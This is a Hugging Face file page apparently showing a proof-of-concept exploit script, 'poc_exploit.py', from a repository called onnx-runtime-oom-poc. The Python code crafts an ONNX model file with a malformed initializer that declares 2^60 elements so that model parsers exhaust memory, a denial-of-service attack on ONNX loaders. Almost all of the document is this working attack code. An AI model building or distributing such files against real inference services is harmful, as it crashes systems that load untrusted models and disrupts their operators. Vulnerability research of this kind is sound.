onnx-runtime-oom-poc / poc_exploit.py
Rodion111's picture
Upload poc_exploit.py with huggingface_hub
a551f75 verified
import onnx
from onnx import helper, TensorProto
import struct
def create_oom_onnx(output_path):
print("[*] Creating ONNX model with huge initializer dimensions...")
# We create an initializer with valid data but MALFORMED dimensions
# so that the parser tries to allocate a huge buffer.
# Valid small data
raw_data = struct.pack("<f", 1.0)
# Huge dimensions: 2^30 * 2^30 = 2^60 elements
huge_dims = [1024*1024*1024, 1024*1024*1024]
initializer = helper.make_tensor(
name="huge_tensor",
data_type=TensorProto.FLOAT,
dims=huge_dims,
vals=[1.0], # Logic in some parsers might try to allocate based on dims first
raw=False
)
node_def = helper.make_node("Identity", ["huge_tensor"], ["output"])
graph_def = helper.make_graph(
[node_def], "oom-graph",
[], # no inputs needed, using initializer
[helper.make_tensor_value_info("output", TensorProto.FLOAT, [1])],
initializer=[initializer]
)
model_def = helper.make_model(graph_def, producer_name="onnx-oom-exploit", opset_imports=[onnx.helper.make_opsetid("ai.onnx", 19)])
onnx.save(model_def, output_path)
print(f"[+] Model saved to {output_path}")
if __name__ == "__main__":
create_oom_onnx("/tmp/oom.onnx")